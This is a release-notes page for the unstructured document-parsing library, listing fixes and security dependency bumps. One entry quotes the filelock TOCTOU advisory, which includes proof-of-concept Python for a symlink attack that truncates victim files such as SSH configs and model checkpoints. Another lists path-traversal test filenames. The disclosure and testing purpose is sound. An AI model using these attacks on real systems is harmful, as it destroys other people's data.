Tags: Unstructured-IO/unstructured

0.18.27

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature.
Fix: partially filled inferred layout mark as not extracted (#4169)

This PR fixes an issue where elements whose extracted text only partially
fills them are marked as extracted.

## Bug scenario
This PR adds a new unit test to showcase a scenario:
- when merging inferred and extracted layouts, the function
`aggregate_embedded_text_by_block` aggregates extracted text that falls
into an inferred element; if all of that text has the flag `is_extracted`
set to `"true"`, the inferred element is marked as such as well
- however, the extracted text may only partially fill the inferred
element. There might be text in the inferred element region that is not
present as extracted text (i.e., it requires OCR). But the current logic
would still mark this inferred element as `is_extracted = "true"`

## Fix
The fix adds another check in the function
`aggregate_embedded_text_by_block`: whether the intersection over union
between the source regions and the target region crosses a given
threshold. This new check correctly identifies that, in the unit test
case, the inferred element should be marked as `is_extracted = "false"`.
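
The PR description does not show the implementation, so the following is only a minimal sketch of the idea. It assumes axis-aligned boxes given as `(x1, y1, x2, y2)`, summarizes the source regions by their bounding hull, and uses a hypothetical threshold of `0.5`. The function names are illustrative and are not the library's API.

```python
from typing import List, Tuple

Box = Tuple[float, float, float, float]  # (x1, y1, x2, y2), assumed axis-aligned


def box_area(box: Box) -> float:
    """Area of a box; degenerate or inverted boxes count as zero."""
    x1, y1, x2, y2 = box
    return max(0.0, x2 - x1) * max(0.0, y2 - y1)


def iou(a: Box, b: Box) -> float:
    """Intersection over union of two boxes."""
    inter = (max(a[0], b[0]), max(a[1], b[1]), min(a[2], b[2]), min(a[3], b[3]))
    inter_area = box_area(inter)
    union_area = box_area(a) + box_area(b) - inter_area
    return inter_area / union_area if union_area > 0 else 0.0


def extracted_text_fills_target(
    sources: List[Box], target: Box, threshold: float = 0.5
) -> bool:
    """Hypothetical check: do the extracted (source) regions cover enough
    of the inferred (target) region to treat it as fully extracted?"""
    if not sources:
        return False
    # Bounding hull of all source regions (an assumption of this sketch).
    hull = (
        min(s[0] for s in sources),
        min(s[1] for s in sources),
        max(s[2] for s in sources),
        max(s[3] for s in sources),
    )
    return iou(hull, target) >= threshold
```

With a check like this, a single line of extracted text at the top of a tall inferred block yields a low IoU, so the block would not inherit `is_extracted = "true"` even though every aggregated text piece carries that flag.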

0.18.26

fix: pin deltalake<1.3.0 for ARM64 Docker builds (#4157)

## Summary
- Pin `deltalake<1.3.0` to fix ARM64 Docker build failures

## Problem
`deltalake` 1.3.0 is missing Linux ARM64 wheels due to a builder OOM
issue on their CI. When pip can't find a wheel, it tries to build from
source, which fails because the Wolfi base image doesn't have a C
compiler (`cc`).

This causes the `unstructured-ingest[delta-table]` install to fail,
breaking the ARM64 Docker image.

delta-io/delta-rs#4041

## Solution
Temporarily pin `deltalake<1.3.0` until:
- deltalake publishes ARM64 wheels for 1.3.0+, OR
- unstructured-ingest adds the pin to its `delta-table` extra

## Test plan
- [ ] ARM64 Docker build succeeds

🤖 Generated with [Claude Code](https://claude.com/claude-code)


---

> [!NOTE]
> Pins a dependency to unblock ARM64 builds and publishes a patch release.
>
> - Add `deltalake<1.3.0` to `requirements/ingest/ingest.txt` to avoid missing Linux ARM64 wheels breaking Docker builds
> - Bump version to `0.18.26` and add corresponding CHANGELOG entry
>
> <sup>Written by [Cursor Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit b4f15b4.</sup>

Co-authored-by: Claude Opus 4.5 <[email protected]>

0.18.24

fix(deps): Update security updates [SECURITY] (#4154)

This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `==3.20.0` → `==3.20.1` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/filelock/3.20.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/filelock/3.20.0/3.20.1?slim=true) |
| [marshmallow](https://redirect.github.com/marshmallow-code/marshmallow) ([changelog](https://marshmallow.readthedocs.io/en/latest/changelog.html)) | `==3.26.1` → `==3.26.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/marshmallow/3.26.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/marshmallow/3.26.1/3.26.2?slim=true) |
| [pypdf](https://redirect.github.com/py-pdf/pypdf) ([changelog](https://pypdf.readthedocs.io/en/latest/meta/CHANGELOG.html)) | `==6.3.0` → `==6.4.0` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/pypdf/6.4.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/pypdf/6.3.0/6.4.0?slim=true) |
| [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.5.0` → `==2.6.0` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.5.0/2.6.0?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2025-68146](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f)

### Impact

A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local
attackers to corrupt or truncate arbitrary user files through symlink
attacks. The vulnerability exists in both Unix and Windows lock file
creation where filelock checks if a file exists before opening it with
O_TRUNC. An attacker can create a symlink pointing to a victim file in
the time gap between the check and open, causing os.open() to follow the
symlink and truncate the target file.

**Who is impacted:**

All users of filelock on Unix, Linux, macOS, and Windows systems. The
vulnerability cascades to dependent libraries:

- **virtualenv users**: Configuration files can be overwritten with
virtualenv metadata, leaking sensitive paths
- **PyTorch users**: CPU ISA cache or model checkpoints can be
corrupted, causing crashes or ML pipeline failures
- **poetry/tox users**: Affected through their use of virtualenv or
through using filelock directly.

Attack requires local filesystem access and ability to create symlinks
(standard user permissions on Unix; Developer Mode on Windows 10+).
Exploitation succeeds within 1-3 attempts when lock file paths are
predictable.

### Patches

Fixed in version **3.20.1**.

**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in
UnixFileLock.\_acquire() to prevent symlink following.

**Windows fix:** Added GetFileAttributesW API check to detect reparse
points (symlinks/junctions) before opening files in
WindowsFileLock.\_acquire().

**Users should upgrade to filelock 3.20.1 or later immediately.**
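
As a rough illustration of the Unix-side change described above (this is not the actual filelock code), the sketch below opens a lock file with `O_NOFOLLOW` so that a symlink planted at the lock path makes `os.open()` fail instead of truncating the symlink's target. The helper name `open_lock_file_no_follow` and the `0o644` mode are assumptions made for the example.

```python
import os


def open_lock_file_no_follow(path: str) -> int:
    """Open (and truncate) a lock file without following a final symlink.

    Hypothetical helper for illustration only. O_NOFOLLOW is a POSIX flag;
    on platforms that lack it, getattr() falls back to 0 and this function
    offers no protection.
    """
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC
    flags |= getattr(os, "O_NOFOLLOW", 0)
    # If `path` is a symlink, the kernel refuses the open with an OSError
    # (ELOOP on Linux), so the symlink's target is never truncated.
    return os.open(path, flags, 0o644)
```

A caller would treat the resulting `OSError` as a failed lock acquisition rather than retrying blindly.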

### Workarounds

If immediate upgrade is not possible:

1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note:
different locking semantics, may not be suitable for all use cases)
2. Ensure lock file directories have restrictive permissions (chmod
0700) to prevent untrusted users from creating symlinks
3. Monitor lock file directories for suspicious symlinks before running
trusted applications

**Warning:** These workarounds provide only partial mitigation. The race
condition remains exploitable. Upgrading to version 3.20.1 is strongly
recommended.
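
Workarounds 2 and 3 could look roughly like the sketch below. Both helper names are hypothetical, and, as the warning above notes, the symlink check is itself subject to a race, so this only narrows the exposure.

```python
import os


def make_private_lock_dir(path: str) -> str:
    """Create a lock directory that only the current user can access."""
    os.makedirs(path, mode=0o700, exist_ok=True)
    # makedirs() honours the umask and leaves existing directories alone,
    # so set the mode explicitly as well.
    os.chmod(path, 0o700)
    return path


def ensure_not_symlink(lock_path: str) -> None:
    """Refuse to proceed if the lock path is currently a symlink."""
    if os.path.islink(lock_path):
        raise RuntimeError(f"refusing to use symlinked lock file: {lock_path}")
```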

______________________________________________________________________

## Technical Details: How the Exploit Works

### The Vulnerable Code Pattern

**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):

```python
def _acquire(self) -> None:
    ensure_directory_exists(self.lock_file)
    open_flags = os.O_RDWR | os.O_TRUNC  # (1) Prepare to truncate
    if not Path(self.lock_file).exists():  # (2) CHECK: Does file exist?
        open_flags |= os.O_CREAT
    fd = os.open(self.lock_file, open_flags, ...)  # (3) USE: Open and truncate
```

**Windows** (`src/filelock/_windows.py:19-28`):

```python
def _acquire(self) -> None:
    raise_on_not_writable_file(self.lock_file)  # (1) Check writability
    ensure_directory_exists(self.lock_file)
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC  # (2) Prepare to truncate
    fd = os.open(self.lock_file, flags, ...)  # (3) Open and truncate
```

### The Race Window

The vulnerability exists in the gap between operations:

**Unix variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file exists? → False
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

**Windows variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file writable?
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink/junction
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

### Step-by-Step Attack Flow

**1. Attacker Setup:**

```python

# Attacker identifies target application using filelock
lock_path = "/tmp/myapp.lock"  # Predictable lock path
victim_file = "/home/victim/.ssh/config"  # High-value target
```

**2. Attacker Creates Race Condition:**

```python
import os
import threading

def attacker_thread():
    # Remove any existing lock file
    try:
        os.unlink(lock_path)
    except FileNotFoundError:
        pass

    # Create symlink pointing to victim file
    os.symlink(victim_file, lock_path)
    print(f"[Attacker] Created: {lock_path} → {victim_file}")

# Launch attack
threading.Thread(target=attacker_thread).start()
```

**3. Victim Application Runs:**

```python
from filelock import UnixFileLock

# Normal application code
lock = UnixFileLock("/tmp/myapp.lock")
lock.acquire()  # ← VULNERABILITY TRIGGERED HERE

# At this point, /home/victim/.ssh/config is now 0 bytes!
```

**4. What Happens Inside os.open():**

On Unix systems, when `os.open()` is called:

```c
// Linux kernel behavior (simplified)
int open(const char *pathname, int flags) {
    struct file *f = path_lookup(pathname);  // Resolves symlinks by default!

    if (flags & O_TRUNC) {
        truncate_file(f);  // ← Truncates the TARGET of the symlink
    }

    return file_descriptor;
}
```

Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates
the target file.

### Why the Attack Succeeds Reliably

**Timing Characteristics:**

- **Check operation** (Path.exists()): ~100-500 nanoseconds
- **Symlink creation** (os.symlink()): ~1-10 microseconds
- **Race window**: ~1-5 microseconds (very small but exploitable)
- **Thread scheduling quantum**: ~1-10 milliseconds

**Success factors:**

1. **Tight loop**: Running attack in a loop hits the race window within
1-3 attempts
2. **CPU scheduling**: Modern OS thread schedulers frequently
context-switch during I/O operations
3. **No synchronization**: No atomic file creation prevents the race
4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only
operation)

### Real-World Attack Scenarios

**Scenario 1: virtualenv Exploitation**

```python

# Victim runs: python -m venv /tmp/myenv
# Attacker racing to create:
os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg")

# Result: /home/victim/.bashrc overwritten with:
#   home = /usr/bin/python3
#   include-system-site-packages = false
#   version = 3.11.2
# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker
```

**Scenario 2: PyTorch Cache Poisoning**

```python

# Victim runs: import torch
# PyTorch checks CPU capabilities, uses filelock on cache

# Attacker racing to create:
os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock")

# Result: Trained ML model checkpoint truncated to 0 bytes
# Impact: Weeks of training lost, ML pipeline DoS
```

### Why Standard Defenses Don't Help

**File permissions don't prevent this:**

- Attacker doesn't need write access to victim_file
- os.open() with O_TRUNC follows symlinks using the *victim's*
permissions
- The victim process truncates its own file

**Directory permissions help but aren't always feasible:**

- Lock files often created in shared /tmp directory (mode 1777)
- Applications may not control lock file location
- Many apps use predictable paths in user-writable directories

**File locking doesn't prevent this:**

- The truncation happens *during* the open() call, before any lock is
acquired
- fcntl.flock() only prevents concurrent lock acquisition, not symlink
attacks

### Exploitation Proof-of-Concept Results

From empirical testing with the provided PoCs:

**Simple Direct Attack** (`filelock_simple_poc.py`):

- Success rate: 33% per attempt (1 in 3 tries)
- Average attempts to success: 2.1
- Target file reduced to 0 bytes in \<100ms

**virtualenv Attack** (`weaponized_virtualenv.py`):

- Success rate: ~90% on first attempt (deterministic timing)
- Information leaked: File paths, Python version, system configuration
- Data corruption: Complete loss of original file contents

**PyTorch Attack** (`weaponized_pytorch.py`):

- Success rate: 25-40% per attempt
- Impact: Application crashes, model loading failures
- Recovery: Requires cache rebuild or model retraining

**Discovered and reported by:** George Tsigourakos (@tsigouris007)

#### [CVE-2025-68480](https://redirect.github.com/marshmallow-code/marshmallow/security/advisories/GHSA-428g-f7cq-pgp5)

### Impact

`Schema.load(data, many=True)` is vulnerable to denial of service
attacks. A moderately sized request can consume a disproportionate
amount of CPU time.

### Patches

4.1.2, 3.26.2

### Workarounds

```py

from marshmallow import ValidationError


# Fail fast: reject non-list input, then load the items one by one
def load_many(schema, data, **kwargs):
    if not isinstance(data, list):
        raise ValidationError(['Invalid input type.'])
    return [schema.load(item, **kwargs) for item in data]
```

#### [CVE-2025-66019](https://redirect.github.com/py-pdf/pypdf/security/advisories/GHSA-jfx9-29x2-rv3j)

### Impact

An attacker who uses this vulnerability can craft a PDF which leads to a
memory usage of up to 1 GB per stream. This requires parsing the content
stream of a page using the LZWDecode filter.

This is a follow up to
[GHSA-jfx9-29x2-rv3j](https://redirect.github.com/py-pdf/pypdf/security/advisories/GHSA-jfx9-29x2-rv3j)
to align the default limit with the one for *zlib*.

### Patches
This has been fixed in
[pypdf==6.4.0](https://redirect.github.com/py-pdf/pypdf/releases/tag/6.4.0).

### Workarounds
If users cannot upgrade yet, use the line below to overwrite the default
in their code:

```python
pypdf.filters.LZW_MAX_OUTPUT_LENGTH = 75_000_000
```

#### [CVE-2025-66418](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53)

### Impact

urllib3 supports chained HTTP encoding algorithms for response content
according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).

However, the number of links in the decompression chain was unbounded,
allowing a malicious server to insert a virtually unlimited number of
compression steps, leading to high CPU usage and massive memory
allocation for the decompressed data.

### Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier for
HTTP requests to untrusted sources unless they disable content decoding
explicitly.

### Remediation

Upgrade to at least urllib3 v2.6.0 in which the library limits the
number of links to 5.

If upgrading is not immediately possible, use
[`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o)
and ensure that `resp.headers["content-encoding"]` contains a safe
number of encodings before reading the response content.
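
The header check in that workaround could be sketched as follows. This is a minimal illustration using only the standard library: the helper names are hypothetical, and the limit of 5 simply mirrors the cap that the advisory says urllib3 v2.6.0 applies.

```python
from typing import Mapping, Optional

MAX_ENCODINGS = 5  # assumption: same cap as the one described for urllib3 2.6.0


def count_content_encodings(header_value: Optional[str]) -> int:
    """Count the comma-separated codings in a Content-Encoding value."""
    if not header_value:
        return 0
    return sum(1 for part in header_value.split(",") if part.strip())


def has_safe_encoding_chain(
    headers: Mapping[str, str], limit: int = MAX_ENCODINGS
) -> bool:
    """Return True if the response declares at most `limit` chained codings."""
    # Header names are case-insensitive, so match on the lowercased key.
    value = next(
        (v for k, v in headers.items() if k.lower() == "content-encoding"),
        None,
    )
    return count_content_encodings(value) <= limit
```

In practice this would be called on `resp.headers` for a response requested with `preload_content=False`, and the body would only be read when the check passes.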

#### [CVE-2025-66471](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37)

### Impact

urllib3's [streaming
API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o)
is designed for the efficient handling of large HTTP responses by
reading the content in chunks, rather than loading the entire response
body into memory at once.

When streaming a compressed response, urllib3 can perform decoding or
decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`,
`deflate`, `br`, or `zstd`). The library must read compressed data from
the network and decompress it until the requested chunk size is met. Any
resulting decompressed data that exceeds the requested amount is held in
an internal buffer for the next read operation.

The decompression logic could cause urllib3 to fully decode a small
amount of highly compressed data in a single operation. This can result
in excessive resource consumption (high CPU usage and massive memory
allocation for the decompressed data; CWE-409) on the client side, even
if the application only requested a small chunk of data.

### Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier to
stream large compressed responses or content from untrusted sources.

`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`,
`readinto(b)` are examples of `urllib3.HTTPResponse` method calls using
the affected logic unless decoding is disabled explicitly.

### Remediation

Upgrade to at least urllib3 v2.6.0 in which the library avoids
decompressing data that exceeds the requested amount.

If your environment contains a package facilitating the Brotli encoding,
upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These
versions are enforced by the `urllib3[brotli]` extra in the patched
versions of urllib3.
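
The general idea of not decompressing more than the caller asked for can be illustrated with the standard library's `zlib`. This is not urllib3's implementation, only a sketch of the technique; `bounded_inflate` is a hypothetical helper.

```python
import zlib
from typing import Tuple


def bounded_inflate(compressed: bytes, max_output: int) -> Tuple[bytes, bytes]:
    """Decompress at most `max_output` bytes of a zlib stream.

    Returns the decompressed chunk and the still-compressed remainder,
    which a caller could feed back in on the next read.
    """
    decompressor = zlib.decompressobj()
    chunk = decompressor.decompress(compressed, max_output)
    return chunk, decompressor.unconsumed_tail


# A small, highly compressible payload: 10 MB of zero bytes.
bomb = zlib.compress(b"\0" * 10_000_000)
chunk, remainder = bounded_inflate(bomb, 256)
```

Here the caller receives no more than 256 bytes and the rest of the input stays compressed, instead of 10 MB being inflated into memory at once.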

### Credits

The issue was reported by @Cycloctane.
Supplemental information was provided by @stamparm during a
security audit performed by [7ASecurity](https://7asecurity.com/) and
facilitated by [OSTIF](https://ostif.org/).

---

### Release Notes

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

### [`v3.20.1`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1)

[Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.20.0...3.20.1)

##### What's Changed

- CVE-2025-68146: Fix TOCTOU symlink vulnerability in lock file creation by [@gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#461](https://redirect.github.com/tox-dev/filelock/pull/461)

**Full Changelog**: <tox-dev/filelock@3.20.0...3.20.1>

</details>

<details>
<summary>marshmallow-code/marshmallow (marshmallow)</summary>

### [`v3.26.2`](https://redirect.github.com/marshmallow-code/marshmallow/blob/HEAD/CHANGELOG.rst#3262-2025-12-19)

[Compare Source](https://redirect.github.com/marshmallow-code/marshmallow/compare/3.26.1...3.26.2)

Bug fixes:

- CVE-2025-68480: Merge error store messages without rebuilding collections. Thanks 카푸치노 for reporting and @deckar01 for the fix.

</details>

<details>
<summary>py-pdf/pypdf (pypdf)</summary>

### [`v6.4.0`](https://redirect.github.com/py-pdf/pypdf/blob/HEAD/CHANGELOG.md#Version-641-2025-12-07)

[Compare Source](https://redirect.github.com/py-pdf/pypdf/compare/6.3.0...6.4.0)

##### Performance Improvements (PI)

- Optimize loop for layout mode text extraction ([#3543](https://redirect.github.com/py-pdf/pypdf/issues/3543))

##### Bug Fixes (BUG)

- Do not fail on choice field without /Opt key ([#3540](https://redirect.github.com/py-pdf/pypdf/issues/3540))

##### Documentation (DOC)

- Document possible issues with merge\_page and clipping ([#3546](https://redirect.github.com/py-pdf/pypdf/issues/3546))
- Add some notes about library security ([#3545](https://redirect.github.com/py-pdf/pypdf/issues/3545))

##### Maintenance (MAINT)

- Use CORE\_FONT\_METRICS for widths where possible ([#3526](https://redirect.github.com/py-pdf/pypdf/issues/3526))

[Full Changelog](https://redirect.github.com/py-pdf/pypdf/compare/6.4.0...6.4.1)

</details>

<details>
<summary>urllib3/urllib3 (urllib3)</summary>

### [`v2.6.0`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#260-2025-12-05)

[Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.5.0...2.6.0)

## Security

- Fixed a security issue where streaming API could improperly handle highly compressed HTTP content ("decompression bombs") leading to excessive resource consumption even when a small amount of data was requested. Reading small chunks of compressed data is safer and much more efficient now. ([GHSA-2xpw-w6gg-jr37](https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37))
- Fixed a security issue where an attacker could compose an HTTP response with virtually unlimited links in the `Content-Encoding` header, potentially leading to a denial of service (DoS) attack by exhausting system resources during decoding. The number of allowed chained encodings is now limited to 5. ([GHSA-gm62-xv2j-4w53](https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53))

> [!CAUTION]
> - If urllib3 is not installed with the optional `urllib3[brotli]` extra, but your environment contains a Brotli/brotlicffi/brotlipy package anyway, make sure to upgrade it to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 to benefit from the security fixes and avoid warnings. Prefer using `urllib3[brotli]` to install a compatible Brotli package automatically.
> - If you use custom decompressors, please make sure to update them to respect the changed API of `urllib3.response.ContentDecoder`.

## Features

- Enabled retrieval, deletion, and membership testing in `HTTPHeaderDict` using bytes keys. ([#3653](https://github.com/urllib3/urllib3/issues/3653))
- Added host and port information to string representations of `HTTPConnection`. ([#3666](https://github.com/urllib3/urllib3/issues/3666))
- Added support for Python 3.14 free-threading builds explicitly. ([#3696](https://github.com/urllib3/urllib3/issues/3696))

## Removals

- Removed the `HTTPResponse.getheaders()` method in favor of `HTTPResponse.headers`. Removed the `HTTPResponse.getheader(name, default)` method in favor of `HTTPResponse.headers.get(name, default)`. ([#3622](https://github.com/urllib3/urllib3/issues/3622))

## Bugfixes

- Fixed redirect handling in `urllib3.PoolManager` when an integer is passed for the retries parameter. ([#3649](https://github.com/urllib3/urllib3/issues/3649))
- Fixed `HTTPConnectionPool` when used in Emscripten with no explicit port. ([#3664](https://github.com/urllib3/urllib3/issues/3664))
- Fixed handling of `SSLKEYLOGFILE` with expandable variables. ([#3700](https://github.com/urllib3/urllib3/issues/3700))

## Misc

- Changed the `zstd` extra to install `backports.zstd` instead of `zstandard` on Python 3.13 and before. ([#3693](https://github.com/urllib3/urllib3/issues/3693))
- Improved the performance of content decoding by optimizing `BytesQueueBuffer` class. ([#3710](https://github.com/urllib3/urllib3/issues/3710))
- Allowed building the urllib3 package with newer setuptools-scm v9.x. ([#3652](https://github.com/urllib3/urllib3/issues/3652))
- Ensured successful urllib3 builds by setting Hatchling requirement to >= 1.27.0. ([#3638](https://github.com/urllib3/urllib3/issues/3638))

</details>


This PR has been generated by [Renovate
Bot](https://redirect.github.com/renovatebot/renovate).

Co-authored-by: utic-renovate[bot] <235200891+utic-renovate[bot]@users.noreply.github.com>

0.18.22

fix(deps): Bump fonttools to address cve (#4125)

> [!NOTE]
> Constrain fonttools to >=4.60.2 (CVE-2025-66034), bump extras to 4.61.0, switch setup_ingest to ubuntu-latest-m, and release 0.18.22.
>
> - **Dependencies**:
>   - Constrain `fonttools>=4.60.2` in `requirements/deps/constraints.txt` to address CVE-2025-66034.
>   - Bump `fonttools` to `4.61.0` in `requirements/extra-*.txt`; refresh files via uv and align constraint references.
> - **CI**:
>   - Update `setup_ingest` job in `.github/workflows/ci.yml` to run on `ubuntu-latest-m`.
> - **Release**:
>   - Bump version to `0.18.22` and update `CHANGELOG.md`.
>
> <sup>Written by [Cursor Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit 6ec072e.</sup>

0.18.21

chore: dependency updates to resolve cves (#4124)

> [!NOTE]
> Release 0.18.21 with broad dependency pin updates across requirements (notably unstructured-inference 1.1.2) to remediate CVEs.
>
> - **Release**
>   - Set version to `0.18.21` and update `CHANGELOG.md`.
> - **Dependencies**
>   - Upgrade `unstructured-inference` to `1.1.2` in `requirements/extra-pdf-image.txt` to address CVEs.
>   - Refresh pins across `requirements/*.txt` (base, dev, test, and extras), including updates like `certifi`, `click`, `pypdf`, `pypandoc`, `paddlepaddle`, `torch`/`torchvision`, `google-auth` stack, `protobuf`, `safetensors`, etc.; normalize pip-compile headers and constraint paths.
>
> <sup>Written by [Cursor Bugbot](https://cursor.com/dashboard?tab=bugbot) for commit face075.</sup>

0.18.20

chore: minor CHANGELOG.md update (#4122)

The last release should actually have been 0.18.19. Let's skip it and just
fix the CHANGELOG.

0.18.18

fix: sanitize MSG attachment filenames to prevent path traversal (GHS… (#4117)

## Summary

Fixes path traversal vulnerability in email and MSG attachment filename
handling (GHSA-gm8q-m8mv-jj5m).

## Changes

### Security Fix

- Sanitizes attachment filenames in `_AttachmentPartitioner` for both
`email.py` and `msg.py`
- Uses `os.path.basename()` to strip path components from filenames
- Normalizes backslashes to forward slashes to handle Windows paths on
Unix systems
- Removes null bytes and other control characters
- Handles edge cases (empty strings, ".", "..")
- Defaults to "unknown" for invalid or dangerous filenames

### Test Coverage

Added 17 comprehensive tests covering:

- Path traversal attempts (`../../../etc/passwd`)
- Absolute Unix paths (`/etc/passwd`)
- Absolute Windows paths (`C:\Windows\System32\config\sam`)
- Null byte injection (`file\x00.txt`)
- Dot and dotdot filenames (`.` and `..`)
- Missing/empty filenames
- Complex mixed path separators
- Valid filenames (ensuring they pass through unchanged)

### Test Results

- ✅ All 17 new security tests pass
- ✅ All 129 existing tests pass
- ✅ No regressions

### Security Impact

Prevents attackers from using malicious attachment filenames to write
files outside the intended directory, which could lead to arbitrary file
write vulnerabilities.

Changes include comprehensive test coverage for various attack vectors
and a version bump to 0.18.18.
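
The sanitization steps listed in this commit message could be sketched roughly as follows. This is an illustration based only on the description above, not the code from `email.py` or `msg.py`; the function name `sanitize_attachment_filename` and the exact set of control characters removed are assumptions.

```python
import os
import re
from typing import Optional

# Assumption: "control characters" means ASCII 0x00-0x1F plus DEL (0x7F).
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def sanitize_attachment_filename(
    filename: Optional[str], default: str = "unknown"
) -> str:
    """Reduce an untrusted attachment filename to a safe bare name."""
    if not filename:
        return default
    # Remove null bytes and other control characters.
    cleaned = _CONTROL_CHARS.sub("", filename)
    # Normalize Windows separators so basename() also strips them on Unix.
    cleaned = cleaned.replace("\\", "/")
    # Keep only the final path component.
    cleaned = os.path.basename(cleaned).strip()
    # Empty names and the special directory entries are never valid.
    if cleaned in ("", ".", ".."):
        return default
    return cleaned
```

For example, `sanitize_attachment_filename("../../../etc/passwd")` yields `"passwd"`, so a file written under the attachment directory cannot escape it through the filename alone.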

---------

Co-authored-by: Claude <[email protected]>

0.18.15

Luke/sept16 CVE (#4094)

Dependency bump and version bump, mainly to resolve the critical vulnerability in deepdiff.

---------

Co-authored-by: cragwolfe <[email protected]>

0.18.14

manual fix for open CVEs (#4085)

unstructured_0.18.14

manual fix for open CVEs (#4085)